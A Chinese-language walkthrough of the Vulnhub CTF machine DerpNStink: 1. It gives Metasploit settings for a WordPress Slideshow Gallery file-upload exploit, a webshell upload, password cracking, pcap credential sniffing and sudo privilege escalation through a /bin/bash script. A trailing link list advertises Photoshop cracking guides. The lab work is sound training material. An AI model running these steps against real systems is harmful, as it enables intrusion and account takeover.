Vulnhub - DerpNStink: 1
扫描存活主机和端口,发现开放了21、22、80端口
访问80端口如下:
查看源码发现/webnotes/info.txt
如下:
@stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live
于是我们需要修改/etc/hosts
文件
192.168.150.147 derpnstink.local
并在最下面找到flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)
接着扫一下目录
发现robots.txt
访问如下:
再访问/temporary/
如下:
再访问/weblog/
可以看到是个wp站点,版本为4.6.9
并且扫到后台目录wp-admin
,尝试弱口令admin/admin成功登录
利用wpscan也可以得到账密admin/admin,并且扫描发现wp插件Slideshow Gallery旧版本1.4.6,这个版本存在文件上传漏洞可以利用
于是我们可以搜索一下该渗透模块
searchsploit Slideshow Gallery
直接利用该脚本上传文件
这里传个phpinfo可以发现成功了
再来手工打一下,上传php恶意代码,例如phpinfo
访问即可看到phpinfo页面
接着上传一句话成功连上蚁剑
在/home
目录下发现还存在mrderp
和stinky
用户
还可以利用msf来提权
use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOSTS 192.168.150.147
set TARGETURI /weblog
set WP_PASSWORD admin
set WP_USER admin
在/var/www/html/weblog/
目录下的wp-config.php文件中找到数据库名wordpress
以及账密root/mysql
于是就可以成功登录phpmyadmin
在wp_posts
表中得到flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
并在wp_users表中发现还存在用户unclestinky/PBW6NTkFvboVVCHU2R9qmNai1WfHSC41
hashcat爆破发现爆不出来
再换john试试得到密码:wedgie57
登录该账号会发现用户权限更大了,并且直接能看到flag2
并且再尝试一下用该密码登录ftp或者ssh到前面获取的用户,发现stinky用户可以成功登录ftp,而ssh都无法登录
在/files/network-logs/
目录下发现了derpissues.txt
,是mrderp与stinky两个用户的对话如下:
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
在/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/
目录下发现key.txt
,是个ssh的私钥
然后利用key登录ssh,这里出现两个问题:一是权限问题,chmod 600 key.txt
即可解决;二是ssh证书失效,在登陆时添加命令-o PubkeyAcceptedKeyTypes=+ssh-rsa
即可解决。连上后在桌面文件发现flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
并在Documents
目录下发现derpissues.pcap
文件,于是通过nc将其下载下来
nc -lvvp 1234 > derpissues.pcap
nc -nv 192.168.150.128 1234 < derpissues.pcap
或者利用scp传输文件
scp -i key.txt stinky@192.168.150.147:/home/stinky/Documents/derpissues.pcap /root/derpissues.pcap
分析流量包,追踪http或者导出http可以发现密码:derpderpderpderpderpderpderp
接着使用该密码成功登录mrderp用户
在桌面发现helpdesk.log
文件如下:
从中发现有个自助网页:https://pastebin.com/RzK9WfGw,可以得到如下信息:
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
于是我们先创建一个binaries
目录,再将/bin/bash
写入derpy.sh
文件并赋予最高权限后执行它
mkdir binaries
cd binaries
echo '/bin/bash' >> derpy.sh
chmod 777 derpy.sh
sudo ./derpy.sh
提权后在/root/Desktop目录下得到flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
后面发现其实可以直接利用cve-2021-4034来提权
相关文章
- Jgit的使用笔记
- 利用Github Action实现Tornadofx/JavaFx打包
- 叹息!GitHub Trending 即将成为历史!
- 微软软了?开源社区讨论炸锅,GitHub CEO 亲自来答
- GitHub Trending 列表频现重复项,前后端都没去重?
- Photoshop Elements 2021版本软件安装教程(mac+windows全版本都有)
- (ps全版本)Photoshop 2020的安装与破解教程(mac+windows全版本都有)
- (ps全版本)Photoshop cc2018的安装与破解教程(mac+windows全版本,包括2023
- 环境搭建:Oracle GoldenGate 大数据迁移到 Redshift/Flat file/Flume/Kafka测试流程
- 每个开发人员都要掌握的:最小 Linux 基础课
- 来撸羊毛了!Windows 环境下 Hexo 博客搭建,并部署到 GitHub Pages
- 超实用!手把手入门 MongoDB:这些坑点请一定远离
- 【GitHub日报】22-10-09 zustand、neovim、webtorrent、express 等4款App今日上新
- 【GitHub日报】22-10-10 brew、minio、vite、seaweedfs、dbeaver 等8款App今日上新
- 【GitHub日报】22-10-11 cobra、grafana、vue、ToolJet、redwood 等13款App今日上新
- Photoshop 2018 下载及安装教程(mac+windows全版本都有,包括最新的2023)
- Photoshop 2017 下载及安装教程(mac+windows全版本都有,包括最新的2023)
- Photoshop 2020 下载及安装教程(mac+windows全版本都有,包括最新的2023)
- Photoshop 2023 资源免费下载(mac+windows全版本都有,包括最新的2023)
- 最新版本Photoshop CC2018软件安装教程(mac+windows全版本都有,包括2023